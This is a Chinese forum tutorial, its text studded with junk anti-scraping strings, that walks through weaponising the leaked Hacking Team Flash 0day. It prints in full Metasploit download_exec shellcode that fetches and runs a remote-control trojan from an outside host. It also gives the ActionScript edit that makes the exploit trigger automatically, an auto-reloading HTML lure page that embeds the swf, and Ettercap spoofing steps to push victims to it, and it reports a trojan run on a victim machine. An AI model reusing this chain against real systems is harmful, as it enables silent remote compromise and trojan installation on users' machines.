|
$ X! y$ ~* n8 K0 z& [ 三、flash 0day之手工代码修改制作下载者实例入侵演示
) J% t8 o$ S5 v9 m$ e5 |7 g 5 z$ Y0 }; @* A: p$ a6 |
% D( ~ N% |) A: A/ H
利用到的工具:
7 k; ~ E/ W- B4 H9 ~: B
" N$ y4 W/ o* u, ]; s
6 I: {5 Z8 k; {4 t Msf 2 Q$ s7 Z& d i7 ~5 q
$ i' ~9 }, @, u# g' B; l
5 e% W) H8 s$ t
Ettercap
% Y& [/ m$ r' z% \& S ) T8 ^/ ] u% n8 z1 y$ z/ i) P
T: J$ G& a$ w
Adobe Flash CS6 / g# A" s/ a: A5 y$ B
" [5 }1 Z6 n" E4 G1 g6 O
& C _, V% c5 O, ]2 a, |4 Y3 _ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 [, v# X! x8 d# n: Q7 g$ U8 R' `
; L2 [. V6 x; _( X/ m0 ^: O$ j, v% s/ Z6 V; x
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options , X1 B! Y1 ]4 W- Z( y- a
4 }" H. q# o) C0 l8 _
) @3 T6 c+ ?9 T/ T, |9 B' b 如图:
8 w/ }& B( p X' _% j" K8 v
* E7 m1 y8 ?* @+ @" K$ x/ q! D |6 E& M; J" z
# }* T1 Z2 B5 Y2 s5 f7 R
- K$ g" A& f- ?$ {- r E! D$ f$ L, [3 i$ ^1 b: v7 T4 }- @
/ B7 {8 u! e/ J& b8 `# m
" R! S9 Y4 I/ Z3 P. b. A7 p! _* L0 X0 X( W1 c$ a
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
, ~ ~+ M8 w; C, U0 s
2 ]& M5 K& S. ]- ~2 T5 q i( X8 d4 `
7 S8 l9 R) u9 J" n+ T% C, A! g
1 H( u4 a+ `0 \: f1 @
! d# \3 [! T6 r1 {
7 o. Z/ X& i8 _' {/ o( R ; w9 p. `. }7 u' L/ z" e
, T+ b% S6 l3 f, v0 H$ F
% S( F3 y7 _ I 然后执行generate -t dword生成shellcode,如下:
' Y% x `, n& d
* N- ^$ ^ ]. ^2 f6 C1 ?6 y
5 D( C; N6 @- ^ I, F
& c" E1 |2 U- V; r5 f 9 k+ |8 q9 U r
- ], g; ]2 x$ z2 e& n; l' J
复制代码到文本下便于我们一会编辑flash exp,如下:
4 s/ u2 H! k2 {; K1 j7 w4 n6 Y 4 |7 s* w& S4 M# V- R
; f: i' y3 s! Y7 n3 K 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0 o4 X" v' |5 v5 d# ]$ h1 k! l. B! h ; P6 i0 Z+ m" C; `& t# g, _
- `$ S, B5 \& r' H. u3 c$ i 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 |( C, \/ T* m& }; f( B
7 |$ H* D2 Q: ~8 c. X6 R
/ _' z5 a5 X3 D% | 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
; c1 f; r0 U' g& z. v9 g+ Q7 ? 0 B* S' \" r" y- g
. i$ o/ ^8 j3 O0 w( ~5 ]3 y
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
5 `: N2 c/ z; w# {5 Q& u . S( d( B& ^& N' A
/ L s1 k. J: \- u u7 | 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, : M) R: k" J: V" \! b" F
6 E) }7 M9 L* i8 m+ g" z" y
2 G6 i; e2 Y4 }% v6 b
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
, d5 V e) E7 R0 L
( G% m. B9 R# r3 L5 F M
/ g+ G k# `$ a 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 [3 ]( \. H& c- `0 b; p, H
3 I+ b8 _9 T! \1 J( H3 s: a1 C
) @( Z$ `+ t- {
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
; R; g1 `# E4 ~, _7 p! y5 G
( L0 V! x3 {0 w5 y u' [# a. I) ~# B; L: D& M7 L4 W7 c" d E- K
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
+ a. q7 T* ]6 o R) m& z" d - c* V2 B6 Q( E
& Y; G% {2 N: h5 z3 [/ H
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' b; V1 A0 |% U4 E: l# w% M8 r3 a, q; r
2 }# N' `3 [1 }% [2 G
% n# V% [% t" \( R% n" i 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
' O; o) ]2 w9 A! D3 ^; ^
0 t& h* S9 j0 c0 B# K( g" C( U
# K+ m4 U5 t! k+ v* h: a! C% D 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ( F* u1 b% Y* K+ D
5 l7 k6 T* m( w( c; |
* s9 }: ]. r" S5 [) r
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ( u$ O9 c" w5 R7 }/ ?# b7 K) e
( g9 a, l: B- n1 g$ A( O6 Q
7 V+ D) D& O: D( T) ~* m6 d 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
8 U6 A) o) m5 S: ~6 d . [9 Y( d4 ], L/ u
1 G( A( F& s7 p
' D$ ?; X+ b! x) f1 M! L # r' Z! |6 ~) ^5 G$ g6 ^+ H
; o2 R) ~* x+ [4 }9 O8 E$ q1 k o
# c6 |/ N4 y: a2 x" G
7 D- c2 M0 `: P* H) ]: ?5 b" i- l0 F2 F0 H" H
下面我们来修改flash 0day exp,需要修改三个文件,分别为: 2 n! `% d3 q7 h- M5 y
- `$ E7 S8 o2 _; [; M
9 c2 b4 Q+ K, e
6 N2 n3 C+ y4 a% g, w $ K8 a. T; t& J- C4 c" e$ W" q
- {+ |: w L" c9 K! a
先修改ShellWin32.as,部分源代码如图: v. d# N+ N: U. M6 E
2 i, m: U1 \* I# N1 Y
& A4 r! N3 o/ r8 X) B% D; Y& h
4 t7 m$ h; W) V3 N/ l
+ c9 g7 Q0 o* f5 H5 I5 }; g) z
. C; @* j/ x7 v 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
4 E5 B. i( k! E. m/ M n8 d
' ~* D1 z6 e B& ^ C
) S5 r6 `5 d. O+ k2 d : Y' }6 R% j _! | P7 i- p/ U5 ^
2 \: V& {; A3 b* Y
- B7 X5 D- T( W1 n5 K, ?8 u; l2 _. I
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ! @7 Q. o& i2 }
: T! f# j+ z$ D3 a& `& P' Y1 B% T+ p, A- J! E2 ~
6 o9 @* ~2 l! G% H z" M
5 {1 o% g/ y* a1 v* |; `- s4 U- i( w2 T8 L0 M% p' R
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
% V: ]$ E, o* [
3 b! j: T" U: [2 Z* n6 I" c8 n- g7 O1 i5 J
* {, C( x6 o5 ~5 O' ?. u
}" j$ ~5 e5 G( ]3 [; {% f7 }% H" P4 X+ @# f' a
+ f4 ~0 J$ z. @$ Z1 b* C, B 4 {) |" o9 y0 t9 o7 d, q2 Q! q
/ k9 y& \/ }2 L# A( u8 ]+ n 2 V% C* w* F# q2 M, E: r4 y C
1 K, N4 r2 u4 @6 h& h& G# n
- K d3 }6 ~% T1 R& @: ~8 T 然后点保存,下面我们来编译一下,打开
7 \/ z* u; J0 N8 S) i & _. Y0 ?& V) X* o! T
4 d, J/ N. R6 l! k7 J exp1.fla然后点文件-发布,看看编译没错误
3 _& q( }/ J& c% w) j- z; w- ?; Z
6 Q3 J; W& ]9 I5 F9 C& c" W
2 L8 c' r8 }8 Y/ }5 D p# k) z 1 g8 } Y7 S& M2 g( x. S1 Q
# a Z2 N% L3 c. B' K
3 G; l, s- i( h Z
6 ]% u9 c. w0 e, E4 _
; _* U+ P7 j$ }, {# v/ N" D! P) b }1 e2 Q- E: x
, {" d; P" T5 q$ r* Y$ S. E - |5 [% |. R( `! e- ]( f. Q
5 C' k: x5 m1 H! k/ }) V K
/ w3 t! G0 S9 k2 z: n, _
% `: w; u* v4 @. z
" a! j8 P' z+ w; v' W$ q! L, k
然后我们把生成的 5 o, u9 R4 W& m: C- u3 ]+ v
0 S/ k& e3 n: T) M( @9 ]
! S' T+ _1 v- G/ W exp1.swf丢到kailinux 的/var/www/html下:
( Z. Q0 B1 C; j! d2 z
5 l9 J$ p1 X0 d/ \: |6 y+ g" J7 t4 |) E* ]& D+ h
然后把这段代码好好编辑一下
- |, h! f- }# l% Z# q4 a; w / ^; ]- c2 h8 W
" I' y1 I8 ~) k2 G ( `6 r0 h7 p5 D# E' y5 b
; ~. A! |! G. X- ]; ^4 E4 A" ^6 o+ x, V: i I4 i8 l D" d" a
4 Z4 Y, m$ W4 D+ @8 J/ `
) L& k* J" d& c3 j$ x1 @" F/ _
4 O+ z8 W1 l' k7 r7 L5 `
( u/ z2 Z q& R
5 V# |7 o( t2 {# J1 ~ C( M/ G
8 x3 Q! I' Z- C7 [! d
\2 v- M: w1 m8 U! H , J( M; o3 r# `* p4 J' E
+ F5 c: t$ ?/ p
+ _% B2 I* O) [- O- m" O: t% ~0 F
2 n( m$ J& }% y1 n. |( x2 M! C0 g6 D
4 |1 A, ~& ]' m1 ~
2 f, t: a& s7 y5 B
2 S& o* ^+ B' K) E4 W9 X" [1 l! } <!DOCTYPE html>
2 Z" D5 c0 Q8 U5 g: ]9 t
. d1 \" s* P- `, B2 B) _: i( ^) [# O G8 ~. x
<html> 2 l, T0 a& V' Y4 e
. }! t2 w: W B
9 x9 V9 M; H( G+ L' n <head>
* W' X, o# V6 E7 R1 y
) g) B" Y/ D7 W7 h8 n
: D$ G7 I. p! d( f+ c8 K9 } h* { <meta http-equiv="Content-Type" content="text/html;
0 m4 y5 [+ \( F. D5 P8 }2 i ; v9 I0 W7 v( N: Q( T. c5 K
* |: `. ]+ `% H+ M charset=utf-8"/>
, K3 X2 s0 ?% E. w8 c d0 [
( z! g1 g; ]* l8 J! v
4 C" p/ t4 I& p" j" c </head> 4 O$ L( ?' o# h- @
8 `! I& r* a- l( c# J
& ^! ?$ O8 J1 B" u2 V% O! u" W3 g
<body> 1 j% V- q% L7 j' e/ z
B9 ~ w4 t) A* y; L) o5 w" k1 ^/ N+ j5 D/ X& p4 L
<h2> Please wait, the requested page is loading...</h2> ' e, r% I% X6 |
+ ^! ?9 A. @: }1 Q4 p5 Q$ M
4 ], q6 C! Y7 M( k/ M1 P: Q; \ <br>
9 O. J9 M# p$ }# G8 B
/ G8 _3 \" o+ @8 m2 c' I! \1 d) q8 E
5 G1 t0 y3 N4 j0 s9 p <OBJECT 2 B, e" t! _+ v2 R8 T
+ o: d" L7 N, |, q2 g+ z2 D* T1 A7 I/ m
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
; F# }0 f: K- u8 ~ 2 \- {2 |7 A" g, S. I
, B1 o+ @% `1 Q5 s3 z6 O! q2 N9 v: w! ^
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
' \& M( u: p0 _! C4 v+ d$ G
4 @7 ^0 ?: L0 [" Y
# U3 l5 q$ }0 H6 e' i3 |9 p4 o </body>
( p; P: o1 U# m2 s( ^* T8 i . g% I- ]2 _$ H* G5 k9 j$ o% b$ j& ]: t, ^
3 z" T0 z* b5 C8 J7 Z3 Z <script>
# }0 k, e* X: B0 Q1 [ + F3 i) H% l9 J
. D/ {! d f: u8 j& j. e setTimeout(function () { , ^, b9 M% u0 O% M Q
" q3 w1 ?5 d! B7 u7 e5 e% O
2 y; p) y: P& ?( a( S( x J# A4 | : D/ [3 {5 U/ n9 j7 K# O4 }
8 E2 v9 {- ?2 Z. m
/ p7 B7 X* P. j; P6 n& e window.location.reload(); ; l5 C. O0 ~" W) g' S
* W3 }% N3 ]! L5 [% M
. E3 [( k3 g& [+ [' Y% ~ }, 10000); 1 d1 n1 K Q: K8 }4 }
7 i. P2 O) v2 u r5 D
+ P8 {, x* r% Y7 R
7 x$ Z) v% K5 D) ]/ x y 6 W( h3 Q5 }( j; Z: R+ p8 m1 s
9 v2 y. [7 z C) d# K l1 Q; |( J </script> & i8 C8 b* I. P+ r
* a6 v" Q l" I& r) J R' d
* q1 }; x) K0 Y T* p4 M" I; V% a </html>
+ ^7 j' _: G0 J$ o# `1 z' G
3 i0 a& e" s- ~! O8 y% o$ R( `# ` K( s8 L$ p
3 S0 A9 Y0 R1 \- {5 |( \
. v0 B/ b2 v6 f+ x& H
6 J8 h) _4 q( X" p3 D) z0 D, q 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
7 q0 ]* @3 k& L8 u
( Z3 p1 Y/ p. i& o0 b( y
0 R, w$ h b4 B4 F6 S - B4 C4 `3 N! F$ q( Q
' v4 d/ m3 Z1 [) B& `; |8 |4 ]: ~
Q" A J, T- p7 { 4 V7 l& d5 q5 v! z8 O( Y
/ @6 e e, E+ D7 n
; B- _# Z. ^9 E S U6 } 3 O* {% e+ P4 W: ]
+ s4 ?# H1 i: a% y
8 a0 F: e8 z+ ?! s 5 v5 ~3 F/ |9 D8 g
0 g7 H9 J( p! \8 m/ L : ~7 B& k) G# F* p' P
* V& X$ I. b+ F9 L' D p
' P) B- a5 i3 Q0 z) Z
下面我们用ettercap欺骗如图: 0 r" o& |2 g, t6 Q* g
4 e. w6 c$ }( y. @. ^7 d
- [4 n+ Q' Q' k/ Z) ?$ c) l
`! ^3 P" Q" ~' X \3 e
6 x5 j/ z8 b# w2 ?+ w+ ]' f$ R0 C2 }
& Y$ J; r: @# x6 P; G ' R! e6 `0 ^' t+ D( M e1 k
" b5 B5 D% j- G1 Y$ z9 \/ @ 下面我们随便访问个网站看看:
3 f* N" _, i3 T4 t4 z% j2 V
& A, R9 _$ f' }& ^ Y! W- z4 C- J4 p% s+ g5 y) q2 p) p
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
5 \$ f1 s" H! i8 T ] 2 p; J- B: ?; y
$ W, w+ J7 \1 _- ~$ g" Q
' X4 V- n7 g* I1 ~4 A* _ - Q. S R* Y* \* _. l/ [" U/ Z4 r
% I7 O0 I: n4 ~# k0 A 我们看另一台, 0 o3 o* V1 W" M: I
6 @ _2 [6 S- p5 P( R6 P
( g: B; J7 x' t6 ~
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
0 Q7 t7 @) U, M. S1 y+ \' P7 e7 b |